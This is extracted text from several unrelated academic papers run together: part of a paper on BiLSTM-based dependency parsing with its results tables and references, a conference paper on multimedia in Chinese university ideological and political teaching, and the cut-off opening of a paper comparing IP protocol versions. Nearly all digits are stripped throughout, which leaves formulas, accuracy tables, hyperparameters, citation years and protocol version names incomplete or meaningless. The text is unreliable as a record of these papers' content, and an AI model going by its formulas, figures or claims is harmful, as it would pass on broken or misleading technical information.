items on the stack and the buffer, and training the bilstm encoder jointly with the rest of the network. graph-based parser graph-based parsing follows the common structured prediction paradigm (taskar et al., ; mcdonald et al., ): predict(s) = arg max y∈y(s) scoreglobal(s,y) scoreglobal(s,y) = ∑ part∈y scorelocal(s,part) given an input sentence s (and the corresponding sequence of vectors x :n) we look for the highest- lstmf xthe concat lstmf xbrown concat lstmf xfox concat lstmf xjumped concat lstmf x∗ concat lstmb s lstmb s lstmb s lstmb s lstmb s vthe vbrown vfox vjumped v∗ mlp mlp mlp mlp + figure : illustration of the neural model scheme of the graph-based parser when calculating the score of a given parse tree. the parse tree is depicted below the sentence. each dependency arc in the sentence is scored using an mlp that is fed the bilstm encoding of the words at the arc’s end points (the colors of the arcs correspond to colors of the mlp inputs above), and the individual arc scores are summed to produce the final score. all the mlps share the same parameters. the figure depicts a single-layer bilstm, while in practice we use two layers. when parsing a sentence, we compute scores for all possible n arcs, and find the best scoring tree using a dynamic-programming algorithm. scoring parse tree y in the space y(s) of valid de- pendency trees over s. in order to make the search tractable, the scoring function is decomposed to the sum of local scores for each part independently. in this work, we focus on arc-factored graph based approach presented in mcdonald et al. ( ). arc-factored parsing decomposes the score of a tree to the sum of the score of its head-modifier arcs (h,m): parse(s) = arg max y∈y(s) ∑ (h,m)∈y score ( φ(s,h,m) ) given the scores of the arcs the highest scoring pro- jective tree can be efficiently found using eisner’s decoding algorithm ( ). mcdonald et al. and most subsequent work estimate the local score of an arc by a linear model parameterized by a weight vec- tor w, and a feature function φ(s,h,m) assigning a sparse feature vector for an arc linking modifier m to head h. we follow pei et al. ( ) and replace the linear scoring function with an mlp. the feature extractor φ(s,h,m) is usually com- plex, involving many elements (see section . ). in contrast, our feature extractor uses merely the bilstm encoding of the head word and the mod- ifier word: φ(s,h,m) = birnn(x :n,h)◦ birnn(x :n,m) the final model is: parse(s) = arg max y∈y(s) scoreglobal(s,y) = arg max y∈y(s) ∑ (h,m)∈y score ( φ(s,h,m) ) = arg max y∈y(s) ∑ (h,m)∈y mlp(vh ◦vm) vi = birnn(x :n, i) the architecture is illustrated in figure . training the training objective is to set the score function such that correct tree y is scored above in- correct ones. we use a margin-based objective (mc- donald et al., ; lecun et al., ), aiming to maximize the margin between the score of the gold tree y and the highest scoring incorrect tree y′. we define a hinge loss with respect to a gold tree y as: max ( , −max y′ =y ∑ (h,m)∈y′ mlp(vh ◦vm) + ∑ (h,m)∈y mlp(vh ◦vm) ) each of the tree scores is then calculated by acti- vating the mlp on the arc representations. the en- tire loss can viewed as the sum of multiple neural networks, which is sub-differentiable. we calculate the gradients of the entire network (including to the bilstm encoder and word embeddings). labeled parsing up to now, we described unla- beled parsing. a possible approach for adding la- bels is to score the combination of an unlabeled arc (h,m) and its label ` by considering the label as part of the arc (h,m,`). this results in |labels|×|arcs| parts that need to be scored, leading to slow parsing speeds and arguably a harder learning problem. instead, we chose to first predict the unlabeled structure using the model given above, and then pre- dict the label of each resulting arc. using this ap- proach, the number of parts stays small, enabling fast parsing. the labeling of an arc (h,m) is performed using the same feature representation φ(s,h,m) fed into a different mlp predictor: label(h,m) = arg max `∈labels mlplbl(vh ◦vm)[`] as before we use a margin based hinge loss. the la- beler is trained on the gold trees. the bilstm en- coder responsible for producing vh and vm is shared with the arc-factored parser: the same bilstm en- coder is used in the parer and the labeler. this sharing of parameters can be seen as an instance of multi-task learning (caruana, ). as we show in section , the sharing is effective: training the bilstm feature encoder to be good at predicting arc-labels significantly improves the parser’s unla- beled accuracy. loss augmented inference in initial experiments, the network learned quickly and overfit the data. in when training the labeled parser, we calculate the structure loss and the labeling loss for each training sentence, and sum the losses prior to computing the gradients. order to remedy this, we found it useful to use loss augmented inference (taskar et al., ). the in- tuition behind loss augmented inference is to update against trees which have high model scores and are also very wrong. this is done by augmenting the score of each part not belonging to the gold tree by adding a constant to its score. formally, the loss transforms as follows: max( , + score(x,y)− max y′ =y ∑ part∈y′ (scorelocal(x,part) + part ∈y)) speed improvements the arc-factored model re- quires the scoring of n arcs. scoring is performed using an mlp with one hidden layer, resulting in n matrix-vector multiplications from the input to the hidden layer, and n multiplications from the hid- den to the output layer. the first n multiplications involve larger dimensional input and output vectors, and are the most time consuming. fortunately, these can be reduced to n multiplications and n vec- tor additions, by observing that the multiplication w · (vh ◦vm) can be written as w ·vh + w ·vm where w and w are are the first and second half of the matrix w and reusing the products across dif- ferent pairs. summary the graph-based parser is straight- forward first-order parser, trained with a margin- based hinge-loss and loss-augmented inference. we depart from the literature by replacing the hand- crafted feature function with a concatenation of bilstm representations of the head and modifier words, and training the bilstm encoder jointly with the structured objective. we also introduce a novel multi-task learning approach for labeled pars- ing by training a second-stage arc-labeler sharing the same bilstm encoder with the unlabeled parser. experiments and results we evaluated our parsing model on english and chi- nese data. for comparison purposes we follow the setup of dyer et al. ( ). data for english, we used the stanford depen- dency (sd) (de marneffe and manning, ) con- version of the penn treebank (marcus et al., ), using the standard train/dev/test splits with the system method representation emb ptb-ym ptb-sd ctb uas uas las uas las this work graph, st order bilstm vectors – – . . . . this work transition (greedy, dyn-oracle) bilstm vectors – – . . . . this work transition (greedy, dyn-oracle) bilstm vectors – – . . . . zhangnivre transition (beam) large feature set (sparse) – . – – . . martins (turboparser) graph, rd order+ large feature set (sparse) – . . – – – pei graph, nd order large feature set (dense) – . – – – – dyer transition (greedy) stack-lstm + composition – – . . . . ballesteros transition (greedy, dyn-oracle) stack-lstm + composition – – . . . . this work graph, st order bilstm vectors yes – . . . . this work transition (greedy, dyn-oracle) bilstm vectors yes – . . . . this work transition (greedy, dyn-oracle) bilstm vectors yes – . . . . weiss transition (greedy) large feature set (dense) yes – . . – – weiss transition (beam) large feature set (dense) yes – . . – – pei graph, nd order large feature set (dense) yes . – – – – dyer transition (greedy) stack-lstm + composition yes – . . . . ballesteros transition (greedy, dyn-oracle) stack-lstm + composition yes – . . . . lezuidema reranking /blend inside-outside recursive net yes . . . – – zhu reranking /blend recursive conv-net yes . – – . – table : test-set parsing results of various state-of-the-art parsing systems on the english (ptb) and chinese (ctb) datasets. the systems that use embeddings may use different pre-trained embeddings. english results use predicted pos tags (different systems use different taggers), while chinese results use gold pos tags. ptb-ym: english ptb, yamada and matsumoto head rules. ptb-sd: english ptb, stanford dependencies (different systems may use different versions of the stanford converter). ctb: chinese treebank. reranking /blend in method column indicates a reranking system where the reranker score is interpolated with the base-parser’s score. the different systems and the numbers reported from them are taken from: zhangnivre : (zhang and nivre, ); martins : (martins et al., ); weiss (weiss et al., ); pei : (pei et al., ); dyer (dyer et al., ); ballesteros (ballesteros et al., ); lezuidema (le and zuidema, ); zhu : (zhu et al., ). same predicted pos-tags as used in dyer et al. ( );chen and manning ( ). this dataset con- tains a few non-projective trees. punctuation sym- bols are excluded from the evaluation. for chinese, we use the penn chinese treebank . (ctb ), using the train/test/dev splits of (zhang and clark, ; dyer et al., ) with gold part- of-speech tags, also following (dyer et al., ; chen and manning, ). when using external word embeddings, we also use the same data as dyer et al. ( ). implementation details the parsers are imple- mented in python, using the pycnn toolkit for neural network training. the code is available at the github repository https://github.com/ elikip/bist-parser. we use the lstm vari- ant implemented in pycnn, and optimize using the adam optimizer (kingma and ba, ). unless otherwise noted, we use the default values provided by pycnn (e.g. for random initialization, learning rates etc). we thank dyer et al. for sharing their data with us. https://github.com/clab/cnn/tree/ master/pycnn the word and pos embeddings e(wi) and e(pi) are initialized to random values and trained together with the rest of the parsers’ networks. in some ex- periments, we introduce also pre-trained word em- beddings. in those cases, the vector representa- tion of a word is a concatenation of its randomly- initialized vector embedding with its pre-trained word vector. both are tuned during training. we use the same word vectors as in dyer et al. ( ) during training, we employ a variant of word dropout (iyyer et al., ), and replace a word with the unknown-word symbol with probability that is inversely proportional to the frequency of the word. a word w appearing #(w) times in the training cor- pus is replaced with the unknown symbol with prob- ability punk(w) = α #(w)+α . if a word was dropped the external embedding of the word is also dropped with probability . . we train the parsers for up to iterations, and choose the best model according to the uas accu- racy on the development set. hyperparameter tuning we performed a very minimal hyper-parameter search with the graph- https://github.com/elikip/bist-parser https://github.com/elikip/bist-parser https://github.com/clab/cnn/tree/master/pycnn https://github.com/clab/cnn/tree/master/pycnn based parser, and use the same hyper-parameters for both parsers. the hyper-parameters of the final net- works used for all the reported experiments are de- tailed in table . word embedding dimension pos tag embedding dimension hidden units in mlp hidden units in mlplbl bi-lstm layers bi-lstm dimensions (hidden/output) / α (for word dropout) . pagg (for exploration training) . table : hyper-parameter values used in experiments main results table lists the test-set accuracies of our best parsing models, compared to other state-of- the-art parsers from the literature. it is clear that our parsers are very competitive, despite using very simple parsing architectures and minimal feature extractors. when not using external embeddings, the first-order graph-based parser with features outperforms all other systems that are not using external resources, including the third-order turboparser. the greedy transition based parser with features also matches or outperforms most other parsers, including the beam-based transition parser with heavily engineered features of zhang and nivre ( ) and the stack-lstm parser of dyer et al. ( ), as well as the same parser when trained using a dynamic oracle (ballesteros et al., ). moving from the simple ( features) to the extended ( features) feature set leads to some gains in accuracy for both english and chinese. interestingly, when adding external word embed- dings the accuracy of the graph-based parser de- grades. we are not sure why this happens, and leave the exploration of effective semi-supervised parsing with the graph-based model for future work. the greedy parser does manage to benefit from the ex- ternal embeddings, and using them we also see gains from moving from the simple to the extended feature set. both feature sets result in very competitive re- unfortunately, many papers still report english parsing results on the deficient yamada and matsumoto head rules (ptb-ym) rather than the more modern stanford-dependencies (ptb-sd). we note that the ptb-ym and ptb-sd results are not strictly comparable, and in our experience the ptb-ym re- sults are usually about half a uas point higher. sults, with the extended feature set yielding the best reported results for chinese, and ranked second for english, after the heavily-tuned beam-based parser of weiss et al. ( ). additional results we perform some ablation ex- periments in order to quantify the effect of the dif- ferent components on our best models (table ). ptb ctb uas las uas las graph (no ext. emb) . . . . –pos . . . . –arclabeler . – . – –loss aug. . . . . greedy (ext. emb) . . . . –pos . . . . –dynoracle . . . . table : ablation experiments results (dev set) for the graph- based parser without external embeddings and the greedy parser with external embeddings and extended feature set. loss augmented inference is crucial for the success of the graph-based parser, and the multi-task learn- ing scheme for the arc-labeler contributes nicely to the unlabeled scores. dynamic oracle training yields nice gains for both english and chinese. conclusion we presented a pleasingly effective approach for feature extraction for dependency parsing based on a bilstm encoder that is trained jointly with the parser, and demonstrated its effectiveness by inte- grating it into two simple parsing models: a greedy transition-based parser and a globally optimized first-order graph-based parser, yielding very com- petitive parsing accuracies in both cases. acknowledgements this research is supported by the intel collaborative research institute for com- putational intelligence (icri-ci) and the israeli sci- ence foundation (grant number / ). we thank lillian lee for her important feedback and efforts invested in editing this paper. we also thank the re- viewers for their valuable comments. references miguel ballesteros, yoav goldberg, chris dyer, and noah a. smith. . training with explo- ration improves a greedy stack-lstm parser. corr, abs/ . . rich caruana. . multitask learning. machine learning, : – , july. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. jason p.c. chiu and eric nichols. . named entity recognition with bidirectional lstm-cnns. transac- tions of the association for computational linguistics, . to appear. kyunghyun cho. . natural language under- standing with distributed representation. corr, abs/ . . james cross and liang huang. . incremental pars- ing with minimal features using bi-directional lstm. in proceedings of the th annual meeting of the as- sociation for computational linguistics, berlin, ger- many, august. association for computational lin- guistics. marie-catherine de marneffe and christopher d. man- ning. . stanford dependencies manual. techni- cal report, stanford university. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proceedings of the rd annual meet- ing of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – , beijing, china, july. association for com- putational linguistics. jason eisner. . three new probabilistic models for dependency parsing: an exploration. in th interna- tional conference on computational linguistics, pro- ceedings of the conference, coling , center for sprogteknologi, copenhagen, denmark, august - , , pages – . jeffrey l. elman. . finding structure in time. cog- nitive science, ( ): – . yoav goldberg and joakim nivre. . a dynamic ora- cle for arc-eager dependency parsing. in proceedings of coling , pages – , mumbai, india, de- cember. the coling organizing committee. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, : – . yoav goldberg. . a primer on neural net- work models for natural language processing. corr, abs/ . . alex graves. . supervised sequence labelling with recurrent neural networks. ph.d. thesis, technical university munich. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . liang huang and kenji sagae. . dynamic pro- gramming for linear-time incremental parsing. in pro- ceedings of the th annual meeting of the associa- tion for computational linguistics, pages – , uppsala, sweden, july. association for computational linguistics. ozan irsoy and claire cardie. . opinion mining with deep recurrent neural networks. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – , doha, qatar, october. association for computational linguistics. mohit iyyer, varun manjunatha, jordan boyd-graber, and hal daumé iii. . deep unordered composi- tion rivals syntactic methods for text classification. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. andrej karpathy, justin johnson, and fei-fei li. . visualizing and understanding recurrent networks. corr, abs/ . . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in proceedings of the rd international conference for learning repre- sentations, san diego, california. eliyahu kiperwasser and yoav goldberg. . easy-first dependency parsing with hierarchical tree lstms. transactions of the association for compu- tational linguistics, . to appear. terry koo and michael collins. . efficient third- order dependency parsers. in proceedings of the th annual meeting of the association for computational linguistics, pages – , uppsala, sweden, july. asso- ciation for computational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the th annual meeting of the associ- ation for computational linguistics, pages – , columbus, ohio, june. association for computational linguistics. sandra kübler, ryan t. mcdonald, and joakim nivre. . dependency parsing. synthesis lectures on human language technologies. morgan & claypool publishers. marco kuhlmann, carlos gómez-rodríguez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics: human language tech- nologies, pages – , portland, oregon, usa, june. association for computational linguistics. guillaume lample, miguel ballesteros, sandeep subra- manian, kazuya kawakami, and chris dyer. . neural architectures for named entity recognition. in proceedings of the conference of the north american chapter of the association for computa- tional linguistics: human language technologies, pages – , san diego, california, june. associ- ation for computational linguistics. phong le and willem zuidema. . the inside- outside recursive neural network model for depen- dency parsing. in proceedings of the conference on empirical methods in natural language process- ing (emnlp), pages – , doha, qatar, october. association for computational linguistics. yann lecun, sumit chopra, raia hadsell, marc’aurelio ranzato, and fu jie huang. . a tutorial on energy-based learning. predicting structured data, . tao lei, yu xin, yuan zhang, regina barzilay, and tommi jaakkola. . low-rank tensors for scor- ing dependency structures. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : long papers), pages – , baltimore, maryland, june. association for computational linguistics. mike lewis, kenton lee, and luke zettlemoyer. . lstm ccg parsing. in proceedings of the con- ference of the north american chapter of the associa- tion for computational linguistics: human language technologies, pages – , san diego, california, june. association for computational linguistics. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . andre martins, noah a. smith, and eric xing. . concise integer linear programming formulations for dependency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in proceedings of the rd annual meet- ing of the association for computational linguistics (acl’ ), pages – , ann arbor, michigan, june. association for computational linguistics. ryan mcdonald. . discriminative training and spanning tree algorithms for dependency parsing. ph.d. thesis, university of pennsylvania. joakim nivre. . incrementality in deterministic de- pendency parsing. in frank keller, stephen clark, matthew crocker, and mark steedman, editors, pro- ceedings of the acl workshop incremental parsing: bringing engineering and cognition together, pages – , barcelona, spain, july. association for com- putational linguistics. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguis- tics, ( ): – . wenzhe pei, tao ge, and baobao chang. . an ef- fective neural network model for graph-based depen- dency parsing. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. mike schuster and kuldip k. paliwal. . bidirec- tional recurrent neural networks. ieee trans. signal processing, ( ): – . benjamin taskar, vassil chatalbashev, daphne koller, and carlos guestrin. . learning structured pre- diction models: a large margin approach. in machine learning, proceedings of the twenty-second interna- tional conference (icml ), bonn, germany, au- gust - , , pages – . hillel taub-tabib, yoav goldberg, and amir glober- son. . template kernels for dependency pars- ing. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies, pages – , denver, colorado, may–june. association for computational linguistics. ivan titov and james henderson. . a latent variable model for generative dependency parsing. in proceed- ings of the tenth international conference on parsing technologies, pages – , prague, czech repub- lic, june. association for computational linguistics. ashish vaswani, yonatan bisk, kenji sagae, and ryan musa. . supertagging with lstms. in pro- ceedings of the th annual conference of the north american chapter of the association for computa- tional linguistics (short papers), san diego, califor- nia, june. oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey e. hinton. . gram- mar as a foreign language. in advances in neural in- formation processing systems : annual conference on neural information processing systems , de- cember - , , montreal, quebec, canada, pages – . david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of the conference on empirical methods in nat- ural language processing, pages – , honolulu, hawaii, october. association for computational lin- guistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon, usa, june. association for computational lin- guistics. chenxi zhu, xipeng qiu, xinchi chen, and xuanjing huang. . a re-ranking model for dependency parser with recursive convolutional neural network. in proceedings of the rd annual meeting of the associ- ation for computational linguistics and the th inter- national joint conference on natural language pro- cessing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. the reform and innovation of ideological and political teaching under the multimedia international conference on sensor network and computer engineering (icsnce ) the reform and innovation of ideological and political teaching under the multimedia xing bo ideological and political department xi’an peihua university xi’an, , shaanxi, china e-mail: @qq.com abstract—with the continuous development of modern information technology, computer network and multimedia technology have been used more and more widely. due to the diversity, integration, control, interactivity, and real-time characteristics of multimedia technology, the application of multimedia technology in teaching has greatly changed the traditional teaching mode of instilling knowledge to students in a single way and in a simple manner. it used its super integrated management of text, text, graphics, images, video, sound etc., making teaching intuitive, novelty, diversity and vivid characteristics, can give full play to the students' thinking ability, cognitive ability and the ability to analyze problems, greatly improve the quality of teaching. applying multimedia technology to the ideological and political course in colleges and universities can help improve the expressiveness and appeal of teaching content, inspire students' interest in learning, increase the credibility and timeliness of teaching content, and create a multidimensional interactive ideological and political classroom model. this will enable the teaching of ideological and political courses in universities to be carried out more effectively. therefore, we should effectively use multimedia technology to assist our teaching in ideological and political education. keywords-multimedia technology; ideological and political courses in colleges and universities; reform strategy i. introduction with the extensive application of multimedia technology in the teaching class, the ideological and political teaching in colleges and universities has radiate new vitality and vitality, from the traditional chalk into today's participatory teaching, from the traditional single teaching mode into today's multi-dimensional interactive teaching mode, greatly improve the efficiency of ideological and political course teaching. but at the same time, it may inevitably bring about many problems, for these exist in the ideological and political class multimedia technology problems, the author puts forward some solving strategies, believe that such a tool as long as reasonable use of multimedia technology, the ideological and political education in colleges and universities can become more productive. figure . network multimedia technology assisted teaching map ii. the role of multimedia technology in the teaching of ideological and political courses a. motivate students' interest in learning in traditional ideological education courses, teachers often use sermon teaching mode, which makes classroom teaching boring and boring, so that class becomes a teacher's "one-man show", so that students lack enthusiasm and initiative, and classroom participation is extremely low. those students often do not know after class, so the quality and efficiency of teaching can not be achieved well. the famous chinese educator confucius once said, "people who understand it are not as good as those who love it, and those who love it are not as good as those who enjoy it." the interest of learning can awaken the students' thirst for knowledge and thus improve the students' learning efficiency. therefore, the ideological and political classroom with a relatively dull content should pay more attention to improving the students' interest and stimulating the curiosity of the students. with the use of new media technology, international conference on sensor network and computer engineering (icsnce ) teachers can transform teaching contents into images, sounds and characters by making ppt and so on. this relatively more novel and lively teaching methods, to help students use all kinds of sense organs participate in teaching activities, passively accept to active learning, make the ideological and political education is more interesting and stimulate the students interest in learning for ideological and political education. b. enhancing the credibility and timeliness of teaching content in the traditional ideological and political education class, because most of the teachers adopt the way of oral teaching, many of the views in the textbook are not so convinced by the students. but the multimedia can go beyond the limitations of time and space, make originally not intuitive knowledge of ideological and political teaching illustrated, by taking advantage of the news, documentaries, the chart data added the textbook knowledge, make both organically, let the students "seeing is believing", greatly increase the credibility of the teaching content. the ideological and political course in colleges and universities is a curriculum which pays great attention to timeliness. however, textbook reprinting is a very time-consuming and laborious process. this leads to the fact that only by learning textbooks cannot be made of the effect of ideological and political education to keep pace with the times .however, in the era of information technology, this situation has a new method of improvement, that is, the use of multimedia technology to innovate ideological and political education class. because multimedia has the dynamic function of spreading the political, economic, cultural and social situations in the world, so teachers can take all kinds of current hot topics on the internet as examples, keep pace with the social reality, and make ideological and political education advance with the times. c. deepening students' understanding of ideological and political issues a large part of the ideological and political problems are very abstract, and it is often difficult to be understood by the students immediately through the teacher's explanation. for example, it is very difficult for students to understand the "law is the inevitable connection of things, phenomena and processes", but by listing some occasional events by pictures, it is easy to deepen students' understanding of this concept through asking and answering questions with students. in fact, many abstract problems in ideological and political education can be solved by similar multimedia technology. because of the intuitive features of the multimedia technology itself, it can easily establish the connection between the content and life, and create a life situation related to the teaching content. it enables students to better understand some abstract ideological and political problems, so that students can master the difficult points in the ideological and political process without difficulty, and improve the teaching quality and efficiency of teachers. figure . multimedia technology assisting the teaching process of ideological and political course d. improving students' memory of teaching content the so-called memory "is the process of encoding, storing and extracting the input information of the outside world, which is divided into three types: instantaneous memory, short-term memory and long-term memory." in the process of ideological and political teaching, how to make the students' memory of teaching content disappear in the darkness after the "registration" in the mind, and even to the point that they have not forgotten for a long time, it has been the common pursuit of all teachers. the new media technology using the echoism tone even dynamic video several angles to promote the students' memory in teaching content, and there is conducive to students through a variety of ways to extract content. let students "bind" what they have learned in various ways to common knowledge, increase the retention rate of students' knowledge, and improve the efficiency of education teaching. iii. the problems of the application of new media technology in the ideological education course a. the content of multimedia courseware is not closely related to the teaching material teaching materials are a basic basis for teachers' learning, so the courseware made by teachers should be based on teaching materials. however, in the college ideological education class, some teachers pay too much attention to the novelty of courseware, so that they ignore the basic principles of teaching materials. multimedia technology is only a supporting tool for teaching, and it is a means for teachers to better illustrate the viewpoint of teaching materials. making courseware out of teaching materials is not only a kind of behavior that is not only to the end of the book, but also may affect the students' attention to the teaching content and hinder the students' understanding of the teaching material. in addition, in ideological education international conference on sensor network and computer engineering (icsnce ) courses in colleges and universities, the classroom teaching is only through the courseware is very serious, teachers control the multimedia courseware to recite, rather than lead students to comprehend teaching materials, the teaching process is completely out of teaching materials. in this way, not only the teacher's subjective status in the teaching is weakened, but also the humanistic care in the ideological and political teaching material can not be read. in the long run, the harm is great. b. the concept of teachers is old and multimedia becomes formalism contrary to the multimedia as the center, the ideological education in colleges and universities also exist such teachers, they ignore the role of multimedia in modern teaching. they always insist on teaching by preaching. they believe that the traditional way of teaching is simpler and easier to write and say. a survey shows that there is such a general situation in colleges and universities that some teachers never use multimedia technology in the normal teaching process. only when public courses are exchanged, can they open multimedia in the classroom for a long time. in this case, multimedia technology is reduced to a formalism. this situation is particularly prominent in the ideological and political teaching. in addition, the imperfect multimedia facilities in colleges and universities are also one of the reasons for this phenomenon. c. teachers become manipulators of machines, weakening students' subjectivity in the process of using ideological and political education with multimedia technology, because the courseware is prepared in advance, the teacher pays great attention to the whole context of the courseware, which leads to the teacher in the teaching process only pay attention to control the multimedia to complete the rigid teaching process and neglected the interaction with students. students often focus on copying the contents of courseware onto their notebooks, and often neglect their teacher's explanation. this is not conducive to the student's thinking in the teaching process, weakening the student's dominant position, resulting in the student's rational thinking can not be good development of. under such circumstances, multimedia is completely reduced to "instilling knowledge machine to students". it not only plays a positive role in promoting ideological and political teaching, but also hinders the emotional communication between teachers and students, making classroom teaching more dull and boring. iv. effectively using multimedia to reform ideological and political education a. the multimedia courseware should be combined with the content of the textbook as a form of better performance of the content of teaching materials, multimedia courseware must obey the contents of the teaching material and can not be divorced from the textbook. in order to stimulate students' interest and arouse students' curiosity, some teachers cite a lot of video and audio in multimedia courseware, blindly seeking novelty, ignoring the content of textbooks, and losing the humanistic care that should be contained in teaching. therefore, teachers must constantly explore how to organically combine multimedia courseware and teaching materials. the multimedia technology is applied to the teaching material and the living situation which is closely related to the content of the teaching material and the thinking characteristics of the students. teachers should use the textbook as the basis, supplemented by the life situation closely related to the content of the teaching materials, and follow the thinking characteristics of the students to use the multimedia technology. only in this way, the instrumental role of multimedia technology in university ideological and political education can be truly displayed. b. teachers should make full use of multimedia technology to cultivate modern talents in the modern era of information technology development, teachers should make full use of multimedia technology to improve the quality and efficiency of ideological and political teaching in colleges and universities. the teachers of the ideological and political education curriculum should get rid of the constraints of the profession and actively learn how to use a lot of media technology in the teaching class. schools should also pay attention to the popularization of multimedia classrooms, make effective use of resources, and train teachers in multimedia operations so that teachers can better use multimedia technology for daily teaching. in addition, teachers should also be practiced to use multimedia technology to teach and reasonably allocate time for use of courseware, so that multimedia can be effectively used without distracting students' attention. c. teachers should combine multimedia technology with teaching “classroom is a powerful interactive environment composed of teachers, students, and the environment. it is a systematic form of education and a unique social organization.” no matter how much multimedia technology can play a role in the ideological and political class, we can never ignore the dominant position of teachers and students. after all, multimedia technology is only used as an auxiliary tool to help teaching, which is doomed it can only be a medium to connect teachers, students and teaching materials, rather than the main body of teaching activities. especially in the teaching of ideological education, for the elaboration of viewpoints in the teaching materials, teachers cannot only use theories to convince people, and often they must also allow students to get the sublimation of their thoughts through emotional communication with students. the interaction and communication between teachers and students is an indispensable requirement for a qualified teaching activity. teachers' language and body movements, even their eyes, play an indispensable role in multimedia technology. therefore, we must not regard multimedia as omnipotent, and we must not let multimedia replace the status of teachers in teaching activities. international conference on sensor network and computer engineering (icsnce ) v. conclusion to sum up, multimedia technology plays an active role in improving teaching activities, which is an important way to improve teaching quality and stimulate students' interest in learning. the application of multimedia technology in teaching has changed the form of traditional teaching, showing the teaching contents in the form of comprehensive multimedia information, deepening the students' understanding of knowledge, and promoting the diversified and comprehensive development of teaching methods. it fully reflects the cooperative relationship between teaching and learning and arouses students' interest in learning. however, as a means of auxiliary teaching, multimedia technology is not a master key, it has its inevitable "double edge", if it is treated reasonably and used effectively, it can greatly improve the quality and efficiency of ideological and political education, on the contrary, it will only hinder the development of ideological and political teaching activities in colleges and universities. only by studying deeply, reasonably designing, developing and using multimedia technology, and combining it with other teaching methods, can we optimize classroom teaching and embody the real value of multimedia technology assisted teaching. references [ ] wang hongmei and zhang jianlong, “research on the combination of multimedia technology and traditional teaching methods”, journal of xinjiang medical university, ( ). [ ] zhang song, “research on construction and application of ideological and political education network system based on video on demand in colleges and universities”, shenyang normal university, . [ ] ma dandan and bai jing, “design and implementation of the comprehensive information platform for smelting enterprises”, international journal of advanced network monitoring and controls. volume , no. , . [ ] han dameng and hu wanqing, “on the problems and countermeasures of multimedia teaching in ideological and political courses in universities”, professional technology, ( ). [ ] zhang haiyan, “a survey of the status quo of college multimedia network teaching and strategies of optimizing modes”, journal of changchun university of science and technology, ( ). [ ] li yihu, “research of integration technology between catia and toolmanager based on caa”, international journal of advanced network, monitoring, and controls. vol. , no. , . [ ] wei zhang, “fuel cell test system based on avr single-chip computer”, international journal of advanced network, monitoring and controls. volume , no. , . [ ] jie huang, “research on balanced energy consumption of wireless sensor network nodes based on clustering algorithm”, international journal of advanced network, monitoring and controls. volume , no. , . [ ] jingwen chen and hongshe dang, “the design of two phase chopping regulation voltage soft starter”, international journal of advanced network monitoring and controls.volume , no. , . http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - comparison research on future network between ipv , ipv and ipv yury halavachou department of the international relations belarusian state university of transport republic of belarus , kirova street, gomel, republic of belarus e-mail: oms@bsut.by xu fei school of computer science and engineering xi’an technological university xi’an, china e-mail: xinfei @qq.com abstract—ipv is the most widely used protocol on the internet, and its address space is . in the early stage of the internet, due to the underestimation of the development of internet, ip resources were very limited. by , there was no address that could be allocated. in order to solve the problem of insufficient addresses, the ietf designed the next generation ipv protocol to replace ipv , ipv has addresses in theory, and however, only one-eighth of the addresses can actually be allocated to end users. at present, barcodes are already having bits, and it cannot be covered, so ipv have some considerable limitations. in , chinese researcher proposed ipv . in order to distinguish from ipv and ipv , the v in ipv is uppercase, not lowercase. the ipv includes three technologies: a new address coding design, a new addressing mechanism and a new address architecture design. these technologies constitute the core technology system at the bottom of the new generation ip network. the new network framework designed on this basis can form a network system that is connected and compatible with existing networks. ipv is not a simple upgrade of ipv or ipv and its address space is by default. the massive address can meet the needs of human activities about years, this paper will introduce the characteristics of the future network, and comparison the system between the ipv , ipv and ipv , and lay a solid foundation for the subsequent development. keywords-ipv ; ipv ; ipv ; future network with the rapid development of science and technology, the world has entered an information age of data communication. the most famous of the data networks is internet, a packet-switched network developed by the u.s. department of defense called the arpanet, which is considered the precursor to the information superhighway. now almost all countries and regions have joined the internet. in order for information to be transmitted correctly over the internet to 